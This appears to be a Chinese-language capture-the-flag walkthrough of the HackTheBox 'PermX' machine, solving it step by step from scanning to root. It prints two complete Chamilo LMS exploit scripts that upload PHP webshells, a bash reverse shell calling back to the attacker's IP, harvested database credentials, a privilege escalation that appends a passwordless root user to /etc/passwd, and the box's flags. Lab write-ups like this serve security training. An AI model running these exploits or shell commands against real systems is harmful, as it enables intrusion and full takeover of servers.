HTB:PermX[WriteUP]

目录

连接至HTB服务器并启动靶机

[1.How many TCP ports are listening on PermX?](#1.How many TCP ports are listening on PermX?)

使用nmap对靶机TCP端口进行开放扫描

[2.What is the default domain name used by the web server on the box?](#2.What is the default domain name used by the web server on the box?)

使用curl访问靶机80端口

[3.On what subdomain of permx.htb is there an online learning platform?](#3.On what subdomain of permx.htb is there an online learning platform?)

使用ffuf对该域名进行子域名FUZZ

使用浏览器直接访问该子域

[4.What is the name of the application running on `lms.permx.htb?](#4.What is the name of the application running on `lms.permx.htb?)

使用Wappalyzer查看该网站技术栈

[5.What version of Chamilo is running on PermX?](#5.What version of Chamilo is running on PermX?)

使用ffuf对子域进行路径FUZZ

使用浏览器访问子域下robots.txt文件

[6.What is the name of the 2023 CVE ID for a stored cross-site scripting vulnerability that leads to remote code execution?](#6.What is the name of the 2023 CVE ID for a stored cross-site scripting vulnerability that leads to remote code execution?)

启动Metasploit

进入CVE.MITRE.ORG网站搜索该CMS相关漏洞

[7.What user is the webserver running as on PermX?](#7.What user is the webserver running as on PermX?)

[8.What is the full path to the file that holds configuration data to include the database connection information for Chamilo?](#8.What is the full path to the file that holds configuration data to include the database connection information for Chamilo?)

本地侧使用nc开始监听

[9.Submit the flag located in the mtz user's home directory.](#9.Submit the flag located in the mtz user's home directory.)

USER_FLAG:7239022c6248c28ed2945734c9e07ac9

[10.What is the full path to the script that the mtz user can run as any user without a password?](#10.What is the full path to the script that the mtz user can run as any user without a password?)

[11./opt/acl.sh allow for changing the access control list on file in what directory? (Don't include the trailing / on the directory.)](#11./opt/acl.sh allow for changing the access control list on file in what directory? (Don't include the trailing / on the directory.))

[12.Does setfacl follow symbolic links by default?(YES)](#12.Does setfacl follow symbolic links by default?(YES))

[13.Submit the flag located in the root user's home directory.](#13.Submit the flag located in the root user's home directory.)

ROOT_FLAG:86f2867102ba7ec4855205a4f2096539


连接至HTB服务器并启动靶机

靶机IP:10.10.11.23

分配IP:10.10.14.12


1.How many TCP ports are listening on PermX?

使用nmap对靶机TCP端口进行开放扫描

nmap -p- --min-rate=1500 -T5 -sS -Pn 10.10.11.23

由扫描结果可见,靶机开放端口:22、80共2个端口


2.What is the default domain name used by the web server on the box?

使用curl访问靶机80端口

curl -I 10.10.11.23:80

┌──(root㉿kali)-[/home/kali/Desktop/temp]

└─# curl -I 10.10.11.23:80

HTTP/1.1 302 Found

Date: Mon, 04 Nov 2024 00:32:59 GMT

Server: Apache/2.4.52 (Ubuntu)

Location: http://permx.htb

Content-Type: text/html; charset=iso-8859-1

由输出可见,直接访问靶机IP将被重定位至:permx.htb


3.On what subdomain of permx.htb is there an online learning platform?

将靶机IP与域名进行绑定

echo '10.10.11.23 permx.htb' >> /etc/hosts

使用ffuf对该域名进行子域名FUZZ

ffuf -u http://permx.htb -H 'Host: FUZZ.permx.htb' -w ../dictionary/subdomains-top1mil-5000.txt -fc 302

再次将靶机IP与该子域进行绑定

echo '10.10.11.23 lms.permx.htb' >> /etc/hosts

使用浏览器直接访问该子域

搜索Chamilo ,可见该子域:lms.permx.htb托管一个在线学习平台


4.What is the name of the application running on `lms.permx.htb?

使用Wappalyzer查看该网站技术栈

可见该页面所用WebAPP为:Chamilo(CMS)


5.What version of Chamilo is running on PermX?

使用ffuf对子域进行路径FUZZ

ffuf -u http://lms.permx.htb/FUZZ -w ../dictionary/common.txt

使用浏览器访问子域下robots.txt文件

进入documentation目录下

由该页面标题可见,该CMS版本为:1.11


6.What is the name of the 2023 CVE ID for a stored cross-site scripting vulnerability that leads to remote code execution?

对该CMS进行漏洞搜索

searchsploit Chamilo

将RCE相关的EXP拷贝到当前目录下

searchsploit -m 49867.py

查看该EXP代码

cat 49867.py 

# Exploit Title: Chamilo LMS 1.11.14 - Remote Code Execution (Authenticated)
# Date: 13/05/2021
# Exploit Author: M. Cory Billington (@_th3y)
# Vendor Homepage: https://chamilo.org
# Software Link: https://github.com/chamilo/chamilo-lms
# Version: 1.11.14
# Tested on: Ubuntu 20.04.2 LTS
# CVE: CVE-2021-31933
# Writeup: https://theyhack.me/CVE-2021-31933-Chamilo-File-Upload-RCE/

from requests import Session
from random import choice
from string import ascii_lowercase

import requests

# This is all configuration stuff,
url = "http://127.0.0.1/chamilo-lms/"  # URL to remote host web root
user_name = "admin"  # User must be an administrator
password = "admin"
command = "id;whoami"

# Where you want to upload your webshell. Must be writable by web server user.
# This spot isn't protectec by .htaccess
webshell_path = 'web/'
webshell_name = f"shell-{''.join(choice(ascii_lowercase) for _ in range(6))}.phar" # Just a random name for webshell file
content = f"<?php echo `{command}`; ?>"

def main():
    # Run a context manager with a session object to hold login session after login
    with Session() as s:
        login_url = f"{url}index.php"
        login_data = {
            "login": user_name,
            "password": password
        }
        r = s.post(login_url, data=login_data) # login request

        # Check to see if login as admin user was successful.
        if "admin" not in r.url:
            print(f"[-] Login as {user_name} failed. Need to be admin")
            return
        print(f"[+] Logged in as {user_name}")
        print(f"[+] Cookie: {s.cookies}")
        file_upload_url = f"{url}main/upload/upload.php"
        # The 'curdirpath' is not santitized, so I traverse to  the '/var/www/html/chamilo-lms/web/build' directory. I can upload to /tmp/ as well
        php_webshell_file = {
            "curdirpath": (None, f"/../../../../../../../../../var/www/html/chamilo-lms/{webshell_path}"),
            "user_upload": (webshell_name, content)
            }

        ## Good command if you want to see what the request looks like without sending
        # print(requests.Request('POST', file_upload_url, files=php_webshell_file).prepare().body.decode('ascii'))

        # Two requests required to actually upload the file
        for i in range(2):
            s.post(file_upload_url, files=php_webshell_file)

        exploit_request_url = f"{url}{webshell_path}{webshell_name}"
        print("[+] Upload complete!")
        print(f"[+] Webshell: {exploit_request_url}")

        # This is a GET request to the new webshell to trigger code execution
        command_output = s.get(exploit_request_url)
        print("[+] Command output:\n")
        print(command_output.text)



if __name__ == "__main__":
    main()

由该EXP注释可知,该EXP基于漏洞:CVE-2021-31933。好像并不是我们要找的2023漏洞

启动Metasploit

msfconsole

搜索Chamilo相关模块

search Chamilo

可见该漏洞模块无需认证可直接代码注入导致RCE,切换至该模块

use exploit/linux/http/chamilo_unauth_rce_cve_2023_34960

查看该模块信息

info

从模块描述可见,该模块基于漏洞:CVE-2023-34960

往上一填,发现答案居然不对,才发现是要找存储型XSS漏洞

进入CVE.MITRE.ORG网站搜索该CMS相关漏洞

stored cross-site进行搜索

该漏洞允许无认证文件执行JS脚本与上传Webshell:CVE-2023-4220


7.What user is the webserver running as on PermX?

我这边直接到Github上寻找该漏洞相关EXP

#!/usr/bin/env python3
# -*- coding: UTF-8 -*-

# Name       : CVE-2023-4220
# Autor      : Insomnia (Jacob S.)
# IG         : insomnia.py
# X          : @insomniadev_
# Yt         : insomnia-dev
# Github     : https://github.com/insomnia-jacob
# Description: Automation of RCE in Chamilo LMS on affected versions of CVE-2023-4220 through a web shell

import argparse
import requests
import time
from os import system
import io


# Colors
red = '\033[31m'
green = '\033[32m'
blue = '\033[34m'
yellow = '\033[93m'
reset = '\033[0m'


def arguments():
    global args
    parser = argparse.ArgumentParser()
    parser.add_argument( '-t', '--target', required=True ,help='Enter the target domain, for example: http://example.com' )
    args = parser.parse_args()
    
    
def check_url_exists(url):
    print(blue,'\n\n[+]', reset, 'Checking if it is vulnerable.')
    
    try:
        response = requests.head(url + '/main/inc/lib/javascript/bigupload/files', allow_redirects=True)
        if response.status_code == 200:
            is_vuln()
            
            try:

                response2 = requests.head(url + '/main/inc/lib/javascript/bigupload/files/insomnia.php', allow_redirects=True)
                if response2.status_code == 200:
                    print(f'Success! open in browser: {url}/main/inc/lib/javascript/bigupload/files/insomnia.php')
                else:
                    upload_file(args.target)
            except requests.RequestException as e:
                print(red,f"[x] Error checking the URL: {e}")
                return False


        else:
            print(f'Error {url}')
    except requests.RequestException as e:
        print(red,f"[x] Error checking the URL: {e}")
        return False


def upload_file(url):
    new_url = url + '/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
    insomnia_php = """
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd'] . ' 2>&1');
    }
?>
</pre>
</body>
</html>
"""
    file_like_object = io.BytesIO(insomnia_php.encode('utf-8'))
    file_like_object.name = 'insomnia.php'  
    files = {'bigUploadFile': file_like_object}
    response3 = requests.post(new_url, files=files)
    print(response3.status_code)
    print(f'Success! open in browser: {url}/main/inc/lib/javascript/bigupload/files/insomnia.php')


def is_vuln():
    print(red,'''
███████████████████████████
███████▀▀▀░░░░░░░▀▀▀███████
████▀░░░░░░░░░░░░░░░░░▀████
███│░░░░░░░░░░░░░░░░░░░│███
██▌│░░░░░░░░░░░░░░░░░░░│▐██
██░└┐░░░░░░░░░░░░░░░░░┌┘░██
██░░└┐░░░░░░░░░░░░░░░┌┘░░██     [*] "It is vulnerable!"
██░░┌┘▄▄▄▄▄░░░░░▄▄▄▄▄└┐░░██
██▌░│██████▌░░░▐██████│░▐██     [*] "It is vulnerable!"
███░│▐███▀▀░░▄░░▀▀███▌│░███
██▀─┘░░░░░░░▐█▌░░░░░░░└─▀██     [*] "It is vulnerable!"
██▄░░░▄▄▄▓░░▀█▀░░▓▄▄▄░░░▄██
████▄─┘██▌░░░░░░░▐██└─▄████     [*] "It is vulnerable!"
█████░░▐█─┬┬┬┬┬┬┬─█▌░░█████
████▌░░░▀┬┼┼┼┼┼┼┼┬▀░░░▐████
█████▄░░░└┴┴┴┴┴┴┴┘░░░▄█████
███████▄░░░░░░░░░░░▄███████
██████████▄▄▄▄▄▄▄██████████
███████████████████████████
''', reset)    


def target(url):
    print(blue ,f'             URL: {url}')
    time.sleep(3)
    system("clear")    

def banner():
    textBanner = rf"""
 / __)/ )( \(  __)___(___ \ /  \(___ \( __ \ ___  / _ \(___ \(___ \ /  \ 
( (__ \ \/ / ) _)(___)/ __/(  0 )/ __/ (__ ((___)(__  ( / __/ / __/(  0 )
 \___) \__/ (____)   (____) \__/(____)(____/       (__/(____)(____) \__/ 
"""
    print(green,textBanner)
    print(yellow,'                                                                            by Insomnia (Jacob S.)')


def main():
    arguments()
    banner()
    target(args.target)
    check_url_exists(args.target)
    

if __name__ == '__main__':
    main()

直接使用该EXP开始漏洞利用

python exploit.py -t http://lms.permx.htb/

直接访问EXP提供的URL,执行whoami命令

由回显可见,当前用户为:www-data


8.What is the full path to the file that holds configuration data to include the database connection information for Chamilo?

本地侧使用nc开始监听

nc -lvnp 1425

通过EXP提供的Webshell反弹shell

bash -c 'bash -i >& /dev/tcp/10.10.14.12/1425 0>&1'

┌──(root㉿kali)-[/home/kali/Desktop/temp]

└─# nc -lvnp 1425

listening on [any] 1425 ...

connect to [10.10.14.12] from (UNKNOWN) [10.10.11.23] 53550

bash: cannot set terminal process group (1173): Inappropriate ioctl for device

bash: no job control in this shell

www-data@permx:/var/www/chamilo/main/inc/lib/javascript/bigupload/files$ whoami

<ilo/main/inc/lib/javascript/bigupload/files$ whoami

www-data

提升TTY

script -c /bin/bash -q /dev/null

搜索WebAPP下所有可能的配置相关文件并输出为列表

find /var/www/chamilo -name 'conf*' -type f 2>/dev/null | tee res.txt

逐个查看文件内容,并匹配'password'字段

cat res.txt | xargs -I {} sh -c 'cat {} | grep "password"'

查询该字段出处:03F6lY3uXAP2bkW8

xargs -I {} sh -c 'grep -m1 "03F6lY3uXAP2bkW8" "{}" && echo "Found in {}"' < res.txt

www-data@permx:/var/www/chamilo$ xargs -I {} sh -c 'grep -m1 "03F6lY3uXAP2bkW8" "{}" && echo "Found in {}"' < res.txt

<lY3uXAP2bkW8" "{}" && echo "Found in {}"' < res.txt

$_configuration['db_password'] = '03F6lY3uXAP2bkW8';

Found in /var/www/chamilo/app/config/configuration.php

从该文件中找出匹配字符串并输出上下5行

grep -C 5 '03F6lY3uXAP2bkW8' /var/www/chamilo/app/config/configuration.php

www-data@permx:/var/www/chamilo$ grep -C 5 '03F6lY3uXAP2bkW8' /var/www/chamilo/app/config/configuration.php

<bkW8' /var/www/chamilo/app/config/configuration.php

// Database connection settings.

$_configuration['db_host'] = 'localhost';

$_configuration['db_port'] = '3306';

$_configuration['main_database'] = 'chamilo';

$_configuration['db_user'] = 'chamilo';

$_configuration['db_password'] = '03F6lY3uXAP2bkW8';

// Enable access to database management for platform admins.

$_configuration['db_manager_enabled'] = false;

/**

* Directory settings.
账户:chamilo

密码:03F6lY3uXAP2bkW8

总结一下,该文件存储着数据库连接信息:/var/www/chamilo/app/config/configuration.php


9.Submit the flag located in the mtz user's home directory.

查看靶机支持登录的用户

cat /etc/passwd

尝试使用该用户对靶机进行SSH服务登录

ssh mtz@10.10.11.23 

查询user_flag位置并查看其内容

mtz@permx:~$ find / -name 'user.txt' 2>/dev/null

/home/mtz/user.txt

mtz@permx:~$ cat /home/mtz/user.txt

7239022c6248c28ed2945734c9e07ac9

USER_FLAG:7239022c6248c28ed2945734c9e07ac9


10.What is the full path to the script that the mtz user can run as any user without a password?

查看该用户可无密码特权运行的命令

sudo -l

mtz@permx:~$ sudo -l

Matching Defaults entries for mtz on permx:

env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User mtz may run the following commands on permx:

(ALL : ALL) NOPASSWD: /opt/acl.sh

存在文件可无密码特权运行:/opt/acl.sh


11./opt/acl.sh allow for changing the access control list on file in what directory? (Don't include the trailing / on the directory.)

通过脚本内容可知,该脚本运行后允许在**/home/mtz**目录下赋任意链接任意权限


13.Submit the flag located in the root user's home directory.

尝试创建连接test ,连接至**/etc/passwd**

ln -s /etc/passwd /home/mtz/test

通过**/opt/acl.sh** 脚本为**/home/mtz/test**链接赋读写权限

sudo /opt/acl.sh mtz rw /home/mtz/test

mtz@permx:~$ ln -s /etc/passwd /home/mtz/test

mtz@permx:~$ ls

priv test user.txt

mtz@permx:~$ sudo /opt/acl.sh mtz rw /home/mtz/test

往**/home/mtz/test**链接中写入新用户

echo '0dayhp::0:0:0dayhp:/root:/bin/bash' >> /home/mtz/test

切换到0dayhp用户bash

su 0dayhp

查找root_flag位置并查看其内容

root@permx:/home/mtz# find / -name 'root.txt'

/root/root.txt

/var/www/chamilo/vendor/symfony/intl/Tests/Data/Bundle/Reader/Fixtures/txt/root.txt

root@permx:/home/mtz# cat /root/root.txt

86f2867102ba7ec4855205a4f2096539

ROOT_FLAG:86f2867102ba7ec4855205a4f2096539

相关推荐
Clockwiseee6 小时前
php伪协议
windows·安全·web安全·网络安全
Lspecialnx_10 小时前
文件解析漏洞中间件(iis和Apache)
网络安全·中间件
学习溢出12 小时前
【网络安全】逆向工程 练习示例
网络·安全·网络安全·渗透测试·逆向工程
孤独的履行者15 小时前
入门靶机:DC-1的渗透测试
数据库·python·网络安全
Blankspace学16 小时前
Wireshark软件下载安装及基础
网络·学习·测试工具·网络安全·wireshark
CVE-柠檬i19 小时前
Yakit靶场-高级前端加解密与验签实战-全关卡通关教程
网络安全
轨迹H1 天前
kali设置中文输入法
linux·网络安全·渗透测试·kali
cr.sheeper1 天前
Vulnhub靶场Apache解析漏洞
网络安全·apache
Autumn.h1 天前
文件解析漏洞
web安全·网络安全·中间件